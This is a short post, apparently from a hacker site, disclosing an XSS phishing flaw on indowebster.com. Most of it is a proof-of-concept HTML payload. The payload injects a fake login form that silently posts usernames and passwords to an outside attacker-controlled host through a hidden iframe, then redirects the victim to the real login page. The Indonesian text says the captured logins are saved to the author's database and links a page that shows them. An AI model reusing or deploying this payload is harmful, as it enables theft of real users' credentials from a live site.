Indowebster.com Phishing Vulnerability

indowebster.com XSSED by SPYRO KiD
POC
<form method="post" action="http://www.indowebster.com/login.php" target="new"><input name="username" id="username" value="" type="hidden" readonly="0" style="position: absolute; left: 0; top: 0; width: 0px; color: #FFFFFF; border-style: solid; border-width: 0; padding: 0; background-color: #FFFFFF" size="0"></form><form method="post" action="http://spyrozone.black-it.net/playground/login.php" target="kid"><input name="username" id="username" value="" type="text"></td></tr><tr><td width="100"><p><label for="password">Password: </label></p></td><td>&nbsp;&nbsp;<input name="password" id="password" type="password"></td></tr><tr><td colspan="2" width="100"><p><input name="go" class="formbutton" value="Login" type="submit" onClick=setTimeout("window.location='http://www.indowebster.com/login.php';",7000);></p></td></tr></tbody></table><p><a href="http://www.indowebster.com/register.php">Belum terdaftar ?</a>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; <a href="http://www.indowebster.com/forgot.php">Lupa password ?</a></p></fieldset></form><iframe name="kid" width="0" height="0" border="0" frameborder="0" src=""></iframe><noscript>" type="hidden"> <input name="password" id="password" type="hidden"> <input name="go" value="Login" src="http://www.spyrozone.net/hacking/storage/2011/10/clickhere.png" type="image"> </form>
Login dengan account terserah. INGAT! Jangan login dengan account asli Anda karena informasi login akan terkirim ke database saya ^_^ . Setelah login, lihat hasilnya di: http://spyrozone.net/playground/indowebster.com-phising.php
Stay Alert, keep learning and Happy hacking!




